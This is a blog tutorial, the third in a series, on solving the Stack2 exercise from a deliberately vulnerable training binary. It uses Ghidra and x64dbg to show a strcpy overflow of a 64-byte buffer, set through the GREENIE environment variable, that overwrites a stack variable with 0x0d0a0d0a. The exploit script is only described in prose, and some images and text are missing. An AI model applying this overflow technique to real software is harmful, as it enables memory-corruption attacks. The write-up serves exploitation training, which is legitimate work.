Reverse engineering PWN tasks or exploiting binary vulnerabilities (Part 3 / Stack2)

Friends, hello everyone! This is the third part of our “pyvn” 🙂 Today we will study the work of Stack2.exe (you can download it HERE).

Links to previous parts:

Exploitation of binary vulnerabilities or learning to “push” (Part 1 / Stack0)

Reverse engineering PWN tasks or exploiting binary vulnerabilities (Part 2 / Stack1)

Stack2

We'll start, as usual, with static analysis. Let's launch GHIDRA:

Loading snake :)

Loading snake 🙂

We throw the “binary” into the project and click on Code Browser:

We analyze…

We get the decompiled code. Pay attention to the variable “local_14”. It is assigned the value of the environment variable “GREENIE”. Then comes the check. If the variable “local_14” is equivalent to 0x0 (NULL), then the program displays the message “Please set the environment variable GREENIE”:

Let's look further… The variable “local_18” is assigned “0” (this is the variable we will overwrite). The notoriously unsafe strcpy() function copies the value of “local_14” to “local_58” (an array of 64 bytes). P.S. Sorry, the array declaration didn't make it onto the screenshot. Next comes the check. If the variable “local_14” is equivalent to “0xd0a0d0a”, then PWN! (we get a message that we are great, we have correctly modified the variable). If not, then “Try again”:

Great! We figured out how the program works. Let's do a small test. Go to the environment variables and add the variable “GREENIE” with the value of 64 characters “A” (since the array is 64 bytes) and “BCDE” (we'll try to overwrite the variable “local_18” with these characters):

Open x64dbg, set a breakpoint on the CMP instruction (we have already done this, we will not dwell on this). We see that the EAX register contains our BCDE “letters”:

Then everything would seem simple, but we have to “overwrite” the variable “local_18” with the symbols “x0d”, “x0a”, …! Those who “fought” know that these are the control symbols CRLF:

  • \x0d – is the Carriage Return (CR) character, ASCII code 13.

  • \x0a – is the Line Feed (LF) character, ASCII code 10.

But how do we write control characters into the value of the environment variable “GREENIE”?

I'll say right away that control characters can be written in environment variables and now we'll write a small one exploit Python script:

Let's look at the code. Var1 is assigned a 64-character string 'A', followed by a “packed” 0x0d0a0d0a in Little-Endian (

Let's execute the script:

Profit!

Profit!

We successfully managed to exploit the unsafe strcpy() function and get the coveted string! P.S. We even wrote an exploit 🙂

If you liked the article – thumbs up! Also subscribe to my TG!

See you in the next part! 🙂

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *